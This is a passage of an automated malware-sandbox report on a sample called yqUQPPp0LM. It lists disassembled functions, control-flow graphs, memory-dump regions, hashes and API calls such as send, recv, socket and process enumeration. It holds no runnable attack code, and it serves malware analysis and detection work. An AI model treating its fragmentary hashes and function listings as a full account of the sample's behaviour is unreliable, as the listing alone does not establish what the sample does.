                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: Ioctlsetsockopt
                                        • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                        • API String ID: 1903391676-2691795271
                                        • Opcode ID: 815ad239dba72cfd633446ef395ad465442f4b12211869571ab9af5963c2c764
                                        • Instruction ID: d56ccb879c10d9eb8726a3229cd2441fb2aa83a83242bcbc8f8b25957769b07f
                                        • Opcode Fuzzy Hash: 815ad239dba72cfd633446ef395ad465442f4b12211869571ab9af5963c2c764
                                        • Instruction Fuzzy Hash: 4351AD70604305ABD711DF28C981BAAB7A9FF88314F158529FD88DB3C2EB71E951CB91
                                        Function 008376A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1651 8376a0-8376be 1652 8376c0-8376c7 1651->1652 1653 8376e6-8376f2 send 1651->1653 1652->1653 1654 8376c9-8376d1 1652->1654 1655 8376f4-837709 call 8372a0 1653->1655 1656 83775e-837762 1653->1656 1657 8376d3-8376e4 1654->1657 1658 83770b-837759 call 8372a0 call 83cb20 call bb8c50 1654->1658 1655->1656 1657->1655 1658->1656
                                        APIs
                                        • send.WS2_32(multi.c,?,?,?,00833D4E,00000000,?,?,008407BF), ref: 008376EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                        • API String ID: 2809346765-3388739168
                                        • Opcode ID: 7639b2fb15de01ae822e4c95ebf5ffc4b2ffac945baa6fc709a8e35106b8925b
                                        • Instruction ID: 06d739dcc5304a8877903cecb7478222cca50affcedeb0c0cb1c90f413030483
                                        • Opcode Fuzzy Hash: 7639b2fb15de01ae822e4c95ebf5ffc4b2ffac945baa6fc709a8e35106b8925b
                                        • Instruction Fuzzy Hash: 9C110AF160D3487BD53097159C57D6B7B9CEBC6B68F051518F808A3242E661DC41C6F3
                                        Function 00837770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1770 837770-83778e 1771 837790-837797 1770->1771 1772 8377b6-8377c2 recv 1770->1772 1771->1772 1773 837799-8377a1 1771->1773 1774 8377c4-8377d9 call 8372a0 1772->1774 1775 83782e-837832 1772->1775 1776 8377a3-8377b4 1773->1776 1777 8377db-837829 call 8372a0 call 83cb20 call bb8c50 1773->1777 1774->1775 1776->1774 1777->1775
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: recv
                                        • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                        • API String ID: 1507349165-640788491
                                        • Opcode ID: a3a7659638602043962637c3eef106ca380a683ec7a9b00db8d96edfd4f294a0
                                        • Instruction ID: c2c06809e36a8cdf9eab42f40628760360b5a3247ee34cf01bd90bd8273cc067
                                        • Opcode Fuzzy Hash: a3a7659638602043962637c3eef106ca380a683ec7a9b00db8d96edfd4f294a0
                                        • Instruction Fuzzy Hash: 1F110AF56093087BD13097159C4AE777B5CEFCAB68F451528F908A3382E661DC40C5F2
                                        Function 008375E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1789 8375e0-8375ed 1790 837607-837629 socket 1789->1790 1791 8375ef-8375f6 1789->1791 1792 83762b-83763c call 8372a0 1790->1792 1793 83763f-837642 1790->1793 1791->1790 1794 8375f8-8375ff 1791->1794 1792->1793 1795 837643-837699 call 8372a0 call 83cb20 call bb8c50 1794->1795 1796 837601-837602 1794->1796 1796->1790
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: socket
                                        • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                        • API String ID: 98920635-842387772
                                        • Opcode ID: cccd5a542fa6854c581e23cd1b2e5a61f58cd3fbf3418068171a329b0900f61c
                                        • Instruction ID: a1aca6b8629246fa442d609e1017cb4b67d09dbce746d353a7dd51478c3a2d80
                                        • Opcode Fuzzy Hash: cccd5a542fa6854c581e23cd1b2e5a61f58cd3fbf3418068171a329b0900f61c
                                        • Instruction Fuzzy Hash: F01148B2A0571177D6205B6DAC17EDB3B98EFC5724F441524F804E62E2E612CCD5D2F2
                                        Function 0744005F Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 672COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1883 744005f-7440170 call 7440136 call 7440171 1896 74401d0-744037e call 7440245 1883->1896 1897 7440172-7440182 1883->1897 1923 7440385-744042b 1896->1923 1924 7440380 call 744038d 1896->1924 1899 744018c 1897->1899 1900 7440187 call 7440193 1897->1900 1902 744016e-7440170 1899->1902 1903 744018e-74401cd 1899->1903 1900->1899 1902->1896 1908 7440171-7440187 call 7440193 1902->1908 1903->1896 1908->1899 1931 744043e-7440447 Process32FirstW 1923->1931 1924->1923 1932 744045d-74409a1 call 7440585 call 7440654 call 74406a6 call 7440818 call 74409a9 1931->1932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PR`SY$`
                                        • API String ID: 0-215690257
                                        • Opcode ID: 528919299b2561a3a11d281ecd9546f9e87471e1a5446ea28f7e356093cd9152
                                        • Instruction ID: 2ba39859335e8f72778606c2f9e7ccdf385847e658bb9a106a3bdd264f6e068d
                                        • Opcode Fuzzy Hash: 528919299b2561a3a11d281ecd9546f9e87471e1a5446ea28f7e356093cd9152
                                        • Instruction Fuzzy Hash: 42D128EB15C111BEB20291452F54AFA6B7EF6C7730B3088ABF607C6512E2E44E6B3571
                                        Function 074400CF Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 632COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1995 74400cf-7440170 call 7440136 call 7440171 2004 74401d0-744037e call 7440245 1995->2004 2005 7440172-7440182 1995->2005 2031 7440385-744042b 2004->2031 2032 7440380 call 744038d 2004->2032 2007 744018c 2005->2007 2008 7440187 call 7440193 2005->2008 2010 744016e-7440170 2007->2010 2011 744018e-74401cd 2007->2011 2008->2007 2010->2004 2016 7440171-7440187 call 7440193 2010->2016 2011->2004 2016->2007 2039 744043e-7440447 Process32FirstW 2031->2039 2032->2031 2040 744045d-74409a1 call 7440585 call 7440654 call 74406a6 call 7440818 call 74409a9 2039->2040
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PR`SY$`
                                        • API String ID: 0-215690257
                                        • Opcode ID: 6df39af90d1cb7fd4de492e16c007f6b1d55d839bde499a3e58c29c3fdd16455
                                        • Instruction ID: 8b34feb94ff19f6c73883e7fcc22bb993b66fa9ace0404b56df179afa2d8f6cd
                                        • Opcode Fuzzy Hash: 6df39af90d1cb7fd4de492e16c007f6b1d55d839bde499a3e58c29c3fdd16455
                                        • Instruction Fuzzy Hash: 21D129EB15C111BEB20291452B54AFA6B7EF6C7730F3088ABF607C6512E2E44E6B3571
                                        Function 07440171 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 592COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2103 7440171-744018c call 7440193 2106 744016e-7440170 2103->2106 2107 744018e-74401cd 2103->2107 2106->2103 2110 74401d0-744037e call 7440245 2106->2110 2107->2110 2128 7440385-744042b 2110->2128 2129 7440380 call 744038d 2110->2129 2136 744043e-7440447 Process32FirstW 2128->2136 2129->2128 2137 744045d-74409a1 call 7440585 call 7440654 call 74406a6 call 7440818 call 74409a9 2136->2137
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PR`SY$`
                                        • API String ID: 0-215690257
                                        • Opcode ID: 8fc412dc2108c1b38ec2e210252dda436add6e232efbc3136233714e05e6933f
                                        • Instruction ID: 4da017a66f63db60f59bdf1b0914bdbc8c948acc12f2a46da66433c5e0ea9669
                                        • Opcode Fuzzy Hash: 8fc412dc2108c1b38ec2e210252dda436add6e232efbc3136233714e05e6933f
                                        • Instruction Fuzzy Hash: 5CC1F8EB15C121BDB10291852F54AFB6B6EF6C7730B3088ABF607C6512E2E44E6B3571
                                        Function 074401C1 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 551COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: 18f5119b9c73a3ce50e5627d2b21b3cb708efad90de4efca2a76b8507b792af3
                                        • Instruction ID: d2bf78d0cccd102348ccf9a973ad6c0f8cddb204acc61818460de4968101997c
                                        • Opcode Fuzzy Hash: 18f5119b9c73a3ce50e5627d2b21b3cb708efad90de4efca2a76b8507b792af3
                                        • Instruction Fuzzy Hash: 97B1E6FB15C121BEB14291412F54AFA6B6EF6C7730B3088ABF607C6512E2A44E6B3571
                                        Function 074401E1 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 541COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: adcc852bb1cc3fa248327846a4970ab2e7431f5efdf0c5323ba711908eaeede0
                                        • Instruction ID: 9076ca248aa38336c325a82424c5923aaeacfe360f277a69f6c4cdd5a65a5a0c
                                        • Opcode Fuzzy Hash: adcc852bb1cc3fa248327846a4970ab2e7431f5efdf0c5323ba711908eaeede0
                                        • Instruction Fuzzy Hash: FDB1D8FB15C121BEB14295412F54AF66B6EF6C7730F3088ABF607C6512E2A44E6B3471
                                        Function 0744025B Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 507COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: 8549a28e20948c4c7e3148a2499c1f547cf73a766f1ed51af99d0c84a70eb451
                                        • Instruction ID: f2863fd813d7b5ff9fb32b6a1bf23e96aea403b8a84282b3e21afa5802da811e
                                        • Opcode Fuzzy Hash: 8549a28e20948c4c7e3148a2499c1f547cf73a766f1ed51af99d0c84a70eb451
                                        • Instruction Fuzzy Hash: 5CA1D6EB15C121BEB24291452F54AFA6B2EF6C7730F3088ABF607C6512E2944E6B3471
                                        Function 074402D6 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 459COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: e0472c2e674cce34e6cdaa8f41eda414dca4d37fee87b2123d072597c9223efb
                                        • Instruction ID: a8377ba3e36389355432d0d09c6e766ed3a0acd09dcc9b21e2c959cd83fe65ec
                                        • Opcode Fuzzy Hash: e0472c2e674cce34e6cdaa8f41eda414dca4d37fee87b2123d072597c9223efb
                                        • Instruction Fuzzy Hash: FF91F8E716C121BEB24291452F54AFA6B2EF6C7730F308CABF607C6512E2944E6B3571
                                        Function 074403D1 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 450COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: 26186caed4d8bae4610a45c5524a96b2370fda95665aa9f4ad4bebb41f8280d1
                                        • Instruction ID: a856161d10b0c89f8266d3ff08b38ef92686e8c90ca29b3e495255660971f373
                                        • Opcode Fuzzy Hash: 26186caed4d8bae4610a45c5524a96b2370fda95665aa9f4ad4bebb41f8280d1
                                        • Instruction Fuzzy Hash: EE9127EB15C111BEB202D5512F50AFA6B2EF6C7730F308CABF607C6512E2944E6B2571
                                        Function 07440362 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 430COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: e0c9418615d1082875078255283e1296a45a4f3f99385ab64f99f3b3c57f8d9a
                                        • Instruction ID: 2e535fab0ad9154afa46472d8e7d96a05699693f4d773a433a7fe946098d014a
                                        • Opcode Fuzzy Hash: e0c9418615d1082875078255283e1296a45a4f3f99385ab64f99f3b3c57f8d9a
                                        • Instruction Fuzzy Hash: 989107E715C111BEB20295512F50AFA672EF6C7730F318CABF607C6512E2A44E6B3571
                                        Function 07400000 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 423COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 67cff1677c292150c0310c7bac843f5022945d2041c07f2662eb85278076f411
                                        • Instruction ID: 74d4ecf6bb8fab6219612fc9da502f166d52eb3d6a924f86a14fcde0305cdf05
                                        • Opcode Fuzzy Hash: 67cff1677c292150c0310c7bac843f5022945d2041c07f2662eb85278076f411
                                        • Instruction Fuzzy Hash: 0981AEEB15C121BD710284952B54BFB676EE5C7730B31883BF807D66A2E2E54E4F11B1
                                        Function 0740000B Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 422COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: e86cb99fd53f1c5c0fa5cdaa084b5afac3ef70c96584f9f6dbb81e7371014c0b
                                        • Instruction ID: b5f8c6561167b455095094a3676d9c4140abc98b43b3048a6d7157c8e3441f06
                                        • Opcode Fuzzy Hash: e86cb99fd53f1c5c0fa5cdaa084b5afac3ef70c96584f9f6dbb81e7371014c0b
                                        • Instruction Fuzzy Hash: B081AEEB19C121BD710284952B54BFB676EE5C7730B31883BF807D6692E2E54E4F11B1
                                        Function 07400020 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 417COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 1ae7d269931cc7fc05b3adf6c38b79a1edd9f9e12fa8b82d93fcce6ebf87ebb0
                                        • Instruction ID: 4406fd4794d19993398b7fa0f09b764233117664c85ef6e4ab8628488177ea0c
                                        • Opcode Fuzzy Hash: 1ae7d269931cc7fc05b3adf6c38b79a1edd9f9e12fa8b82d93fcce6ebf87ebb0
                                        • Instruction Fuzzy Hash: 2A818DEB19C121BD7102C4952B54BFB676EE5C7730B31883BF807D66A2E2A54E4F11B1
                                        Function 0740002E Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 415COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 9543194332edf52e6415495a4545e42e44f6b5421f2485d007976859148310e6
                                        • Instruction ID: ad334addcdbace44a6fd9de3b5db5315231eec374afa210e12fb14cf88047d85
                                        • Opcode Fuzzy Hash: 9543194332edf52e6415495a4545e42e44f6b5421f2485d007976859148310e6
                                        • Instruction Fuzzy Hash: 93818FEB19C121BD7102C4952B54BFB676EE5C7730B31883BF807D66A2E2A54E4F11B1
                                        Function 07400059 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 412COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 533f740604775af3ad6facf63ea9369901293353aa729251dcd4c089424a8f3b
                                        • Instruction ID: d524b7e6d9144e4382073ed6b90c5c141549756c288c958150906b6ee9799ace
                                        • Opcode Fuzzy Hash: 533f740604775af3ad6facf63ea9369901293353aa729251dcd4c089424a8f3b
                                        • Instruction Fuzzy Hash: A6817DEB19C121BEB10284952B54BFB676EE5C7730B31883BF807D6692E2E54E4F11B1
                                        Function 07400036 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 412COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 7c9e61562497ce2a9a306de9d805283fb5b37256511081745c64ebb3e6c668df
                                        • Instruction ID: 6519853128c037cb7ec9a38cfcfceb0b8fef73a263838ca7961e931f1f841738
                                        • Opcode Fuzzy Hash: 7c9e61562497ce2a9a306de9d805283fb5b37256511081745c64ebb3e6c668df
                                        • Instruction Fuzzy Hash: D2818EEB19C121BDB102C4952B54BFB676EE5C7730B31883BF807D6692E2A54E4F11B1
                                        Function 07400081 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 402COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: edaf3a0dad1a9ec4ad5c77dfe0414e6c9607214a4baeb5c7989f2de1a9f7d9f8
                                        • Instruction ID: aca5ac839c15e3370dd9fa8b2e794657d3f48ec122e8f051640020169cf72ab3
                                        • Opcode Fuzzy Hash: edaf3a0dad1a9ec4ad5c77dfe0414e6c9607214a4baeb5c7989f2de1a9f7d9f8
                                        • Instruction Fuzzy Hash: E281A0EB15C111BEB102C5952B54BFB676EE5C7730B31883BF807C6592E2A44E4F11B1
                                        Function 07400070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 401COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
